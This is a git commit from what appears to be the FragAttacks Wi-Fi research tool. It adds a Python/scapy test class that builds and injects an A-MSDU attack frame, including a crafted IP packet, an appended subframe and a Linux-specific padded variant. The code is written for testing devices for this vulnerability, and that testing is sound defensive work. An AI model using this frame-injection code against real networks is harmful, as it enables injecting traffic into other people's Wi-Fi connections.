fragattack: test A-MSDU attack and Linux variant

2024-11-28 10:18:21 -05:00 · 2020-05-27 01:43:52 -04:00 · 2020-05-27 01:43:52 -04:00 · 0dcaf9a36c
commit 0dcaf9a36c
parent 3e76decf16
3 changed files with 44 additions and 1 deletions
--- a/research/fragattack.py
+++ b/research/fragattack.py
@ -8,7 +8,9 @@ from wpaspy import Ctrl
 from scapy.contrib.wpa_eapol import WPA_key
 from scapy.arch.common import get_if_raw_hwaddr

+# FIXME: Import here to avoid loops
 from tests_qca import *
+from tests_attacks import *

 # ----------------------------------- Utility Commands -----------------------------------

@ -1491,6 +1493,9 @@ def prepare_tests(opt):
 	elif opt.testname == "qca-rekey":
 		test = QcaDriverRekey()

+	elif opt.testname == "amsdu-attack":
+		test = AmsduAttack(REQ_ICMP, stractions == "linux")
+
 	# No valid test ID/name was given
 	else: return None

--- a/research/libwifi
+++ b/research/libwifi
@ -1 +1 @@
-Subproject commit a0bfa1be06d2437f92b75fe08266adae0a145e80
+Subproject commit 69c61780992dc66313e194f97958380ffc110643
--- a/research/tests_attacks.py
+++ b/research/tests_attacks.py
@ -0,0 +1,38 @@
+from fragattack import *
+
+class AmsduAttack(Test):
+	"""
+	Inject a frame identical to the one the station would receive when performing
+	the A-MSDU attack by injecting an IP packet with a specific identification field.
+	"""
+
+	def __init__(self, ptype, linux=False):
+		super().__init__([Action(Action.Connected, Action.Inject, enc=True)])
+		self.ptype = ptype
+		self.linux = linux
+
+	def prepare(self, station):
+		log(STATUS, "Generating A-MSDU attack test frame", color="green")
+
+		# Generate the header and payload
+		header, request, self.check_fn = generate_request(station, self.ptype)
+
+		# This checks if the to-DS is set (frame towards the AP) --- XXX Utility function for this?
+		if header.FCfield & 1 != 0:
+			src = station.mac
+			dst = station.get_peermac()
+		else:
+			dst = station.peermac
+			src = station.bss
+
+		# Put the request inside an IP packet
+		if not self.linux:
+			p = header/LLC()/SNAP()/IP(dst="192.168.1.2", src="1.2.3.4", id=34)/TCP()
+		else:
+			p = header/LLC()/SNAP()/IP(dst="192.168.1.2", src="3.5.1.1")/Raw(b"A" * 768)
+		p = p/create_msdu_subframe(src, dst, request, last=True)
+		p[Dot11QoS].Reserved = 1
+
+		# Schedule transmission of frame
+		self.actions[0].frame = p
+